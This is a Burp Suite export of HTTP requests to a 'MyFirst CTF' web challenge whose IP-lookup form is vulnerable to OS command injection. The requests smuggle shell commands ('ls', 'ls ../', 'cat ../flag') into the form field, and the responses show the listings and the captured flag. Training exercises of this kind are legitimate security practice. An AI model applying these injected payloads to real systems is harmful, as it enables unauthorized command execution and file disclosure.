<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 16:55:23 CST 2018">
  <item>
    <time>Thu Dec 13 16:54:00 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:1004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>300</responselength>
    <mimetype>XML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:00 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 26 Jan 2018 03:01:26 GMT
ETag: "37-563a51cb60d80"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0;url=index.php" />]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:54:00 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php HTTP/1.1
Host: 140.110.112.32:1004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>1395</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:00 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Vary: Accept-Encoding
Content-Length: 1182
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <title>MyFirst CTF</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="css/login.css" rel="stylesheet">
    <script src="login/js/jquery-1.11.1.min.js"></script>
    <script src="login/js/bootstrap.min.js"></script>
</head>
<body>



<h2></h2>

    <div class="container">
	
        <div class="card card-container">
			<h2 class="text-center"><font color="black" >MyFirst CTF</font></h2>
	
            <p id="profile-name" class="profile-name-card"></p>
            <form method="post" class="form-signin" action="index.php">
        
                <input type="text" id="inpuID" name="string" class="form-control" placeholder="￨ﾫﾋ￨ﾼﾸ￥ﾅﾥIP" >

                <button class="btn btn-lg btn-success btn-block btn-signin" type="submit">￩ﾀﾁ￥ﾇﾺ</button>

				<div class="alert alert-warning" >
	
					 
					
					</div>
            </form>

        </div>
    </div>
	
<script type="text/javascript">

</script>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:54:07 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:1004
Content-Length: 16
Cache-Control: max-age=0
Origin: http://140.110.112.32:1004
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

string=127.0.0.1]]></request>
    <status>200</status>
    <responselength>1492</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:07 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Vary: Accept-Encoding
Content-Length: 1279
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <title>MyFirst CTF</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="css/login.css" rel="stylesheet">
    <script src="login/js/jquery-1.11.1.min.js"></script>
    <script src="login/js/bootstrap.min.js"></script>
</head>
<body>



<h2></h2>

    <div class="container">
	
        <div class="card card-container">
			<h2 class="text-center"><font color="black" >MyFirst CTF</font></h2>
	
            <p id="profile-name" class="profile-name-card"></p>
            <form method="post" class="form-signin" action="index.php">
        
                <input type="text" id="inpuID" name="string" class="form-control" placeholder="￨ﾫﾋ￨ﾼﾸ￥ﾅﾥIP" >

                <button class="btn btn-lg btn-success btn-block btn-signin" type="submit">￩ﾀﾁ￥ﾇﾺ</button>

				<div class="alert alert-warning" >
	
					<pre>Server:		127.0.0.11
Address:	127.0.0.11#53

1.0.0.127.in-addr.arpa	name = localhost.

</pre> 
					
					</div>
            </form>

        </div>
    </div>
	
<script type="text/javascript">

</script>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:54:13 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:1004
Content-Length: 24
Cache-Control: max-age=0
Origin: http://140.110.112.32:1004
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

string=127.0.0.1%3Bls%3B]]></request>
    <status>200</status>
    <responselength>1539</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:14 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Vary: Accept-Encoding
Content-Length: 1326
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <title>MyFirst CTF</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="css/login.css" rel="stylesheet">
    <script src="login/js/jquery-1.11.1.min.js"></script>
    <script src="login/js/bootstrap.min.js"></script>
</head>
<body>



<h2></h2>

    <div class="container">
	
        <div class="card card-container">
			<h2 class="text-center"><font color="black" >MyFirst CTF</font></h2>
	
            <p id="profile-name" class="profile-name-card"></p>
            <form method="post" class="form-signin" action="index.php">
        
                <input type="text" id="inpuID" name="string" class="form-control" placeholder="￨ﾫﾋ￨ﾼﾸ￥ﾅﾥIP" >

                <button class="btn btn-lg btn-success btn-block btn-signin" type="submit">￩ﾀﾁ￥ﾇﾺ</button>

				<div class="alert alert-warning" >
	
					<pre>Server:		127.0.0.11
Address:	127.0.0.11#53

1.0.0.127.in-addr.arpa	name = localhost.

css
fonts
images
index.html
index.php
js
login
</pre> 
					
					</div>
            </form>

        </div>
    </div>
	
<script type="text/javascript">

</script>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:54:23 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:1004
Content-Length: 30
Cache-Control: max-age=0
Origin: http://140.110.112.32:1004
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

string=127.0.0.1%3Bls+..%2F%3B]]></request>
    <status>200</status>
    <responselength>1502</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:23 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Vary: Accept-Encoding
Content-Length: 1289
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <title>MyFirst CTF</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="css/login.css" rel="stylesheet">
    <script src="login/js/jquery-1.11.1.min.js"></script>
    <script src="login/js/bootstrap.min.js"></script>
</head>
<body>



<h2></h2>

    <div class="container">
	
        <div class="card card-container">
			<h2 class="text-center"><font color="black" >MyFirst CTF</font></h2>
	
            <p id="profile-name" class="profile-name-card"></p>
            <form method="post" class="form-signin" action="index.php">
        
                <input type="text" id="inpuID" name="string" class="form-control" placeholder="￨ﾫﾋ￨ﾼﾸ￥ﾅﾥIP" >

                <button class="btn btn-lg btn-success btn-block btn-signin" type="submit">￩ﾀﾁ￥ﾇﾺ</button>

				<div class="alert alert-warning" >
	
					<pre>Server:		127.0.0.11
Address:	127.0.0.11#53

1.0.0.127.in-addr.arpa	name = localhost.

flag
html
</pre> 
					
					</div>
            </form>

        </div>
    </div>
	
<script type="text/javascript">

</script>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:54:32 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:1004/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>1004</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:1004
Content-Length: 35
Cache-Control: max-age=0
Origin: http://140.110.112.32:1004
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:1004/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

string=127.0.0.1%3Bcat+..%2Fflag%3B]]></request>
    <status>200</status>
    <responselength>1524</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:54:33 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Vary: Accept-Encoding
Content-Length: 1311
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <title>MyFirst CTF</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="login/css/bootstrap.min.css" rel="stylesheet">
	<link href="css/login.css" rel="stylesheet">
    <script src="login/js/jquery-1.11.1.min.js"></script>
    <script src="login/js/bootstrap.min.js"></script>
</head>
<body>



<h2></h2>

    <div class="container">
	
        <div class="card card-container">
			<h2 class="text-center"><font color="black" >MyFirst CTF</font></h2>
	
            <p id="profile-name" class="profile-name-card"></p>
            <form method="post" class="form-signin" action="index.php">
        
                <input type="text" id="inpuID" name="string" class="form-control" placeholder="￨ﾫﾋ￨ﾼﾸ￥ﾅﾥIP" >

                <button class="btn btn-lg btn-success btn-block btn-signin" type="submit">￩ﾀﾁ￥ﾇﾺ</button>

				<div class="alert alert-warning" >
	
					<pre>Server:		127.0.0.11
Address:	127.0.0.11#53

1.0.0.127.in-addr.arpa	name = localhost.

MyFirstCTF{JuMs3v3dPI2l927pJg3a}</pre> 
					
					</div>
            </form>

        </div>
    </div>
	
<script type="text/javascript">

</script>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
</items>
